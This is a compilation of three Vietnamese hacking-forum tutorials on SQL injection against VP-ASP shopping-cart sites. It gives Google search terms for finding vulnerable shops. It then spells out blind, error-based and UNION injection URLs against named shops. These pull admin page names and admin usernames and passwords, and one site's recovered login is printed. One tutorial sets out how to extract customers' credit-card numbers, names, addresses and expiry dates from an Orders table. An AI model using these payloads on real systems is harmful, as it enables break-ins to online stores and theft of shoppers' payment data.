TUTORIALFROMHCV ---- Đây là phương pháp hack lỗi SQL nâng cao đối với các shop VP-ASP. Được sự giúp đỡ của 1 admin trong HCV hiện tại Quoc xin được chia sẻ với các bạn ********************************************** Vuln: SQL Inject in VP-ASP all of version Exploiter: Unknown Tool: Mozilla Firefox Download ********************************************** Đầu tiên, bạn phải tìm ra shop của victim Công cụ:http://google.com/ Keyword: shopdisplayproducts.asp? shopaddtocart.asp? shopexd.asp Các bạn tự tìm thêm key cho mình nhé. Ví dụ ở đây tui chọn shop CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1 Sau đó chúng ta thêm dấu ' vao phía sau link thành như sau CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1' Ok, chúng ta bắt đầu tìm link admin nhé ---- Tìm chữ đầu tiên trong link admin, các bạn thêm dòng lệnh này vao phía sau link trên nhé CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fieldname%20from%20configuration% 20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='s') Chúng ta sẽ thay dần giá trị 's' sao cho ứng với kí tự đầu tiên của link Ở đây tui tìm được là kí tự 'a' ---- Sau đó tìm tiếp chiều dài của link admin (thường thì tu gia trị thứ 5 trở đi vì link admin sẽ có thêm .asp ví du admin.asp <--- có 9 kí tự) CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fieldname%20from%20configuration% 20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a' and len(fieldvalue)=5) Thay tiếp giá trị 5 thành các giá trị số cho đến khi tìm được đúng chiều dài của link admin. Ở đây mình tìm được là 15 ki tự ---- Tiếp theo tìm các kí tự còn lại trong link admin nhé. CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fieldname%20from%20configuration% 20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,2)='ad') Thay đổi dần giá trị trong lệnh left ứng với vị trí kí tự của link admin. Sau khi tìm được link admin, chúng ta sẽ được adminonline.asp ---- Tiếp theo tìm username Các bạn thêm câu truy vấn này phía sau link nhé CODE %20or%201=(select%20fldusername%20from%20tbluser%20where%20left(fldusername,1)='q') Khi đó câu truy vấn sẽ là CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldusername%20from%20tbluser% 20where%20left(fldusername,1)='s') Ở đây kí tự đầu tiên là 's' ---- Tiếp theo tìm chiều dài của username CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldusername%20from%20tbluser% 20where%20left(fldusername,1)='s' and len(fldusername)=3) Chúng ta sẽ tìm được username là "sfp" ---- Tìm password Cũng tương tự như trên chỉ cần thay fldusername bằng fldpassword Các bạn thêm câu truy vấn này phía sau link nhé CODE %20or%201=(select%20fldpassword%20from%20tbluser%20where%fldusername='sfp' and left(fldpassword,1)='p') Tìm password tương ứng với username là "sfp". Chữ đầu tiên là 'p' Khi đó câu truy vấn sẽ là CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldpassword%20from%20tbluser% 20where%fldusername='sfp' and left(fldpassword,1)='p') Ở đây kí tự đầu tiên là 'p' ---- Tiếp theo tìm chiều dài của password CODE https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldpassword%20from%20tbluser% 20where%fldusername='sfp' and left(fldpassword,1)='p' and len(fldpassword)=11) Sau khi tìm được chúng ta sẽ co pass là 'performance' ************************************************************* Cuối cùng sau khi hoàn tất chúng ta sẽ có link admin là http://www.sfp.net/adminonline.asp user: sfp pass: performance TUTORIAL BY CONGLAPHVA -Vào www.google.com.vn đánh vào -allinurl:'/product.asp/' -allinurl:'/product.asp?productid/' -allinurl:'/logint.asp' -Bây giờ ta bắt đầu công việc,tôi chọn 1 site để hackhttp://www.victim.com/store/category.asp?CategoryID=83 -Kiểm tra lỗi:http://www.victim.com/store/category.asp?CategoryID=83' ( ta chỉ cần đánh vào dấu ' để test lỗi ) -Kết quả: Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ''. /store/includes/common.asp, line 2116 1. Thu thập cấu trúc dữ liệu : Lấy Table đầu tiên http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201% 20table_name%20from%20information_schema.tables))--sp_password Kết quả: Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'StateTaxes' to a column of data type int. /store/includes/common.asp, line 2116 Như vậy ta có table đầu tiên là StateTaxes. Lấy tiếp table thứ hai : http://www.victim.com/store/category.asp?CategoryID=82%20and%201=convert(int,(select%20top%201% 20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('StateTaxes')))-- sp_password Kết quả: Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'BillingAddresses' to a column of data type int. /store/includes/common.asp, line 2116 Như vậy table thứ hai là BillingAddresses Lấy tiếp table thứ ba http://www.victim.com/store/category.asp?CategoryID=82%20and%201=convert(int,(select%20top%201% 20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20 ('StateTaxes','BillingAddresses')))--sp_password Kết quả: Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'Categories' to a column of data type int. /store/includes/common.asp, line 2116 các bạn cứ lấy kết quả của table thứ 3 (chữ màu xanh) thay thế vào sau table 3 là lấy được toàn bộ table của site này VD: http://www.victim.com/store/category.asp?CategoryID=82%20and%201=convert(int,(select%20top%201% 20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20 ('StateTaxes','BillingAddresses','Categories')))--sp_password -Còn đây là toàn bộ table của site này http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201% 20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20 ('StateTaxes','BillingAddresses','Categories','Countries','CreditCards','Discounts','dtproperties','Groups','homeblurb','Ite mGroups','Items','Manufacturers','Members','OrderItems','OrderItemsShipped','Orders','SavedCart','SavedCartItems','Se cure','SessionData','Settings','SettingsFreeShippingCountries'.'ShippingAddresses')))--sp_password CC thường chứa trong các table Orders hay creditcard, ở đây tôi chọn Orders để hack. Lấy Column đầu tiên http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201% 20column_name%20from%20information_schema.columns%20where%20table_name=('Orders')))--sp_password Kết quả: Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'OrderID' to a column of data type int. /store/includes/common.asp, line 2116 Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'DateCreated' to a column of data type int. /store/includes/common.asp, line 2116 Ta lần lượt lấy hết coloum của table này, có kết quả như sau: http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201% 20column_name%20from%20information_schema.columns%20where%20table_name=('Orders')%20and% 20column_name%20not%20in%20 ('OrderID','DateCreated','MemberID','ShippingMethod','Company','FirstName','LastName','Address1','Address2','City',' State','Zip','ForeignAddress','Country','Phone','Fax','Email','CardName','CardType','CardNumber','ExpirationDate','Car dAddress','CardZip','ShippingAddress1','SubTotal','Discount','DiscountDescription','Tax','Shipping','OrderTotal','PONu mber','ResaleNumber','Handling','Comments','Referer','StoreName','ShippingCompany','ShippingFirstName','Shipping LastName','ShippingAddress2','ShippingCity','ShippingState','ShippingZip','ShippingForeignAddress','ShippingCountr y','ShippingPhone','ShippingFax','CardVerification','CardVerificationNone','CardVerificationRead','PhoneOrder','FRE EShippingMethod')))--sp_password Ta lấy thông tin của coloum này Các coloum quan trọng thường là First/Last name/Address1/city/state/zip/Country/phone/fax/email/cardname/ cardtype/Cardnumber/ExpirationDate/CNV2 (tuy nhiên site này o có cnv2) ->nhiêu đó chắc cũng đủ rồi nhỉ? Theo đường link này sẽ có cc http://www.victim.com/store/category.asp?CategoryID=82%20and%201=convert(int,(select%20top%201% 20CardName%2b'/'%2bAddress1%2b'/'%2bCity%2b'/'%2bState%2b'/'%2bZip%2b'/'%2bPhone%2b'/'%2bCountry% 2b'/'%2bCardNumber%2b'/'%2bExpirationDate%20from%20Orders))--sp_password các bạn cần thông tin gì thì cứ chèn /'%2b******%2b'/ vào tìm được cc đầu tiên,các bạn dùng link này để lấy cc thứ 2 và tiếp tục http://www.victim.com/store/category.asp?CategoryID=82%20and%201=(select%20top%201%20CardName%2b% 27/%27%2bAddress1%2b%27/%27%2bCity%2b%27/%27%2bState%2b%27/%27%2bZip%2b%27/%27%2bPhone% 2b%27/%27%2bCountry%2b%27/%27%2bCardNumber%2b%27/%27%2bExpirationDate%20from%20Orders% 20where%20CardNumber%20not%20in('XXXXXXXXXXXXXXX')%20) Llấy được cc thứ 2 thì lấy số number của card đó thêm vào sau link trên chỗ 'XXXXXXXXXXXXXXXX' TUTORIAL BY SEAMOUN Tôi thấy các bạn quan tâm nhiều đến hack shop VPASP, nên tôi viết một bài để các tham khảo, mặc dù cũ nhưng tôi thấy cũng còn nhiều Web bị lỗi này. VPASP khỏi cần nói các bạn cũng biết đó là Shopping Cart. Phiên bản bị lỗi SQL - Injection là 4.5 và 5.0 còn những phiên bản mới thì tôi không có source để xem nó còn lỗi gì hay không ? Vì VPASP thường sử dụng cơ sở dữ liệu MS Access cho nên việc ngắt lệnh như SQL - Server là không thể cho nên chỉ còn một cách là hợp lệnh SQL để lấy kết quả. Thực hiện các bước sau: Bước 1: Vào Google.com, tìm cụm từ sau: allinurl: shopdisplaycategories.asp. Bạn sẽ thấy ra cả đống site. Kiểm tra link xem có bị lỗi SQL - Injection hay không ? Bước 2: Đối với phiên bản VPASP 4.5 thì lỗi tại file shopdisplaycategories.asp và shopdisplayproducts.asp. Ở phiên bản VPASP 5.0 thì đã sửa lỗi hai file trên nhưng còn một chỗ vẫn bị lỗi là file shopexd.asp Ví dụ site sau: http://www.hopscotchdressingup.co.uk/store/shopdisplayproducts.asp?id=8'&cat=Halloween. Mặc dù ta đã thêm ' ở tại shopdisplayproducts.asp?id=8' nhưng vẫn không bị lỗi. Ta thử tiếp file link sau : http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149'. Nó xuất hiện lỗi HTTP 500 - Internal server error Internet Explorer Bước 3: Ta thực hiện gộp lệnh để lấy giá trị username và password như sau: Link ban đầu :http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149 Link gộp truy vấn : http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=-1 union select catalogid,ccode, fldusername%2b'/'% 2bfldpassword,cdescription,cprice,ccategory,cdescurl,features,cimageurl,cstock,w eight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,specialoffer,categor y,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,templ ate,extendedimage,extendeddesc,selectlist,level3,level4,level5,minimumquantity,s upplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdown load,groupfordiscount,clanguage,points,pointstobuy,price2,price3,billprice,billi nstallments,billinstallmenttype,billinterval,maximumquantity,frontpage from products,tbluser where catalogid=149 . Các bạn sẽ hỏi là cái đống hỗn độn ở link trên lấy ở đâu ra?Hì hì chỉ đọc source VPASP mới biết nó gồm những trường nào trong bản product rồi từ đó gộp lệnh cho đủ các trường và thay thế trường tên của sản phầm bằng trường username và password. Sở dĩ ta phải cho id=-1 để ngắt lệnh SQL thứ nhất khi hợp nhất thì nó sẽ thực hiện lệnh SQL thứ hai. Sau khi hợp SQL ta sẽ có kết quả user và password là "Sy87XXXXX/gL37ytXXXXX" là hai giá trị được thay thế tại tên của sản phẩm. Như vậy ta đã có user và password của admin rồi. Mừng quá login vào shopadmin.asp thôi !. Thông thường thì tên file Admin ControlPanel là shopadmin.asp nếu như nó chưa đổi. Bước 4: Ta truy cập vào http://www.hopscotchdressingup.co.uk/store/shopadmin.asp thử xem thế nào? Chà ! file nó đổi tên mất rồi. Làm sao đây ? Tiếp tục gộp lệnh để lấy tên file đã thay đổi thôi ! Cũng với link http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149 ta gộp lệnh như sau để lấy tên file truy cập vào Admin Control Panel. http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=-1 union select catalogid,ccode,fieldvalue,cdescription, cprice,ccategory,cdescurl,features,cimag eurl,cstock,weight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,special offer,category,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,k eywords,template,extendedimage,extendeddesc,selectlist,level3,level4,level5,mini mumquantity,supplierid,crossselling,hide,productmatch,customermatch,orderattachm ent,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3,bi llprice,billinstallments,billinstallmenttype,billinterval,maximumquantity,frontp age from products,configuration where fieldname='xadminpage' and catalogid=149 Sau khi thực hiện ta đã có tên file truy cập vào Admin Control Panel là hopoff.asp Như vậy ta có thể truy cập đến file Admin. http://www.hopscotchdressingup.co.uk/store/hopoff.asp. Lưu ý: Khi truy cập vào Admin Control Panel nếu gặp hai trường nhập password thì : một là ngồi thử hai là đi kiếm cái khác. Vì password thứ 2 là một hằng nên không thể dùng cách hợp lệnh để lấy được. Muốn lấy chắc viết email đến admin hỏi thử password thứ hai là gì, tôi đã có password thứ nhất của you rôi !!! Hi hi hi Đối với phiên bản VPASP 4.5 thì cũng làm tương tự như trên chỉ khác là ở chỗ gộp lệnh lấy username, password và tên file truy cập vào Admin Control Panel Ví dụ : http://<site bị lỗi>/shopdisplaycategories.asp?id=1 chẳng hạn. Thì lệnh gộp lấy username, password và tên file admin như sau http://<site bị lỗi>/shopdisplaycategories.asp?id=1 union select catalogid,ccode,fldusername%2b':'% 2bfldpassword, cdescription,cprice,ccategory,cdescurl,features,cimageurl,cstock,w eight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,specialoffer,categor y,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,templ ate,extendedimage,extendeddesc,selectlist,level3,level4,level5,minimumquantity,s upplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdown load,groupfordiscount,clanguage,points,pointstobuy,price2,price3 from products,tbluser where 1=1 or 1=1 http://<site bị lỗi>/shopdisplaycategories.asp?id=1 union select catalogid,ccode,fieldvalue,cdescription,cprice, ccategory,cdescurl,features,cimag eurl,cstock,weight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,special offer,category,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,k eywords,template,extendedimage,extendeddesc,selectlist,level3,level4,level5,mini mumquantity,supplierid,crossselling,hide,productmatch,customermatch,orderattachm ent,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3 from products,tbluser,configuration where fieldname='xadminpage' Site VPASP sử dụng cơ sở dữ liệu SQL - Server thì quá dễ để khai thác như sau http://<site bị lỗi>/shopdisplaycategories.asp?id=1 and%201=convert(int,(select%20top%201%20fldusername%2b'/'%2bfldpassword%20from%20tbluser))-- sp_password http://<site bị lỗi>/shopdisplaycategories.asp?id=1 and%201=convert(int,(select top 1 fieldvalue from configuration where fieldname='xadminpage'))--sp_password PS: Mấy you thực hành thì đừng có file site của họ nha ! . 